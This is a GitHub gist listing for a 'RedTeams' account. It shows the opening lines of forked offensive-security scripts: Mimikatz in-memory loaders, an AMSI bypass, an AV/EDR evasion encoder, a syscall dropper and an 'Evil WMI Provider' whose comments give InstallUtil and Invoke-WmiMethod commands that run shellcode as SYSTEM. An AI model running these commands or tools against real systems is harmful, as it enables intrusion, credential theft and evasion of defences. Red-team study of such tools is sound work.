RedTeams
RedTeams
/ Office 365 EXO EWS with Cert Auth API Example.ps1
Created
March 20, 2025 06:56
— forked from poiriersimon/Office 365 EXO EWS with Cert Auth API Example.ps1
Exchange Online EWS with Certificate Authentication
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #For this example you need an Azure App registered with a Self Sign Cert and a user with EWS Access to grab email. | |
| #You need AzureAD Module (Save-Module AzureAD -Path C:\temp) | |
| #You need EWS API 2.2 (www.microsoft.com/en-us/download/details.aspx?id=35371) | |
| #App need to have Office 365 API access to read email. | |
| # Permission under Office 365 Exchange Online: | |
| # Admin : Use Exchange Web Services with full access to all mailboxes | |
| # Delegate : Delegated permissions: full_access_as_user – Access mailbox as signed in user via Exc… | |
| # Cert : https://github.com/Azure-Samples/active-directory-dotnet-daemon-certificate-credential/blob/master/Manual-Configuration-Steps.md | |
| <# | |
| $cert=New-SelfSignedCertificate -Subject "CN=Office365APIDemo" -CertStoreLocation "Cert:\CurrentUser\My" -KeyExportPolicy Exportable -KeySpec Signature |
RedTeams
/ EncodeAssembly.ps1
Created
March 18, 2025 11:10
— forked from Mayfly277/EncodeAssembly.ps1
This script is a modification of the one from @snovvcrash website : https://ppn.snovvcrash.rocks/pentest/infrastructure/ad/av-edr-evasion/dotnet-reflective-assembly and some code of PowerSharpPack. This is made to package some bniaries to powershell.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Function Invoke-EncodeAssembly | |
| { | |
| [CmdletBinding()] | |
| Param( | |
| [Parameter(Mandatory=$true)] | |
| [String] | |
| $binaryPath, | |
| [Parameter(Mandatory=$true)] | |
| [String] |
RedTeams
/ EvilWMIProvider.cs
Created
February 3, 2025 12:49
— forked from nicholasmckinney/EvilWMIProvider.cs
Evil WMI Provider
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Based On LocalAdmin WMI Provider by Roger Zander | |
| // http://myitforum.com/cs2/blogs/rzander/archive/2008/08/12/how-to-create-a-wmiprovider-with-c.aspx | |
| // Adapted For Evil By @subTee | |
| // Executes x64 ShellCode | |
| // | |
| // Deliver and Install dll | |
| // C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe /i EvilWMIProvider.dll | |
| // Invoke calc for SYSTEM level calculations | |
| // Invoke-WmiMethod -Class Win32_Evil -Name ExecShellCalcCode | |
| // Invoke-WmiMethod -Namespace root\cimv2 -Class Win32_Evil -Name ExecShellCode -ArgumentList @(0x90,0x90,0x90), $null |
RedTeams
/ COM-ScheduledTasks.ps1
Created
January 13, 2025 22:18
— forked from thed06/COM-ScheduledTasks.ps1
Scheduled Tasks in PowerShell Version 2 via Schedule.Service COM Object
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Install-ScheduledTask { | |
| <# | |
| .SYNOPSIS | |
| Install a scheduled task using Schedule.Service COM object. | |
| .DESCRIPTION | |
| This function installs a scheduled task using Schedule.Service COM object. | |
| .PARAMETER TaskPath | |
| String. The path of the task. | |
| .PARAMETER TaskName |
RedTeams
/ syscall_dropper.c
Created
January 9, 2025 18:07
— forked from bats3c/syscall_dropper.c
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <stdio.h> | |
| #include <windows.h> | |
| #include <wincrypt.h> | |
| #include <tlhelp32.h> | |
| #include <ntdef.h> | |
| #include <winternl.h> | |
| #include "main.h" | |
| /****************************************************************************************************/ |
RedTeams
/ netkatz.cs
Created
January 8, 2025 17:18
— forked from ethack/netkatz.cs
Downloads and Executes Mimikatz In Memory From GitHub
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.IO; | |
| using System.Net; | |
| using System.Text; | |
| using System.IO.Compression; | |
| using System.Collections.Generic; | |
| using System.Configuration.Install; | |
| using System.Runtime.InteropServices; |
RedTeams
/ Tasks.cs
Created
January 8, 2025 17:13
— forked from analyticsearch/Tasks.cs
Almost :) - BulletProof Mimikatz - Load and execute Mimikatz in stordiag.exe.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.IO; | |
| using System.Text; | |
| using System.IO.Compression; | |
| using System.EnterpriseServices; | |
| using System.Collections.Generic; | |
| using System.Runtime.InteropServices; | |
| using System.Security.Cryptography; | |
| /* |
RedTeams
/ bloodhoundce_import.py
Created
January 8, 2025 11:32
— forked from aconite33/bloodhoundce_import.py
Import large files into BloodHound CE Edition
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| import json | |
| import time | |
| import argparse | |
| import getpass | |
| import os | |
| import sys | |
| def main(): |
RedTeams
/ Program.cs
Created
January 6, 2025 19:46
— forked from susMdT/Program.cs
C# Amsi bypass with hardware breakpint
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Collections.Generic; | |
| using System.Linq; | |
| using System.Runtime.CompilerServices; | |
| using System.Net; | |
| using System.Reflection; | |
| using System.Runtime.InteropServices; | |
| namespace Test | |
| { | |
| // CCOB IS THE GOAT |
RedTeams
/ bof_headers.py
Created
August 15, 2022 16:46
— forked from analyticsearch/bof_headers.py
This script do most of the heavy lifting for generating C headers for Cobalt Strike BOF, but this is not 100% accurate.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import os | |
| import sys | |
| try: | |
| import pefile | |
| import argparse | |
| import requests | |
| from bs4 import BeautifulSoup | |
| except ImportError as e: | |
| print("[-] One of the following module is not installed:") | |
| print("\t- bs4") |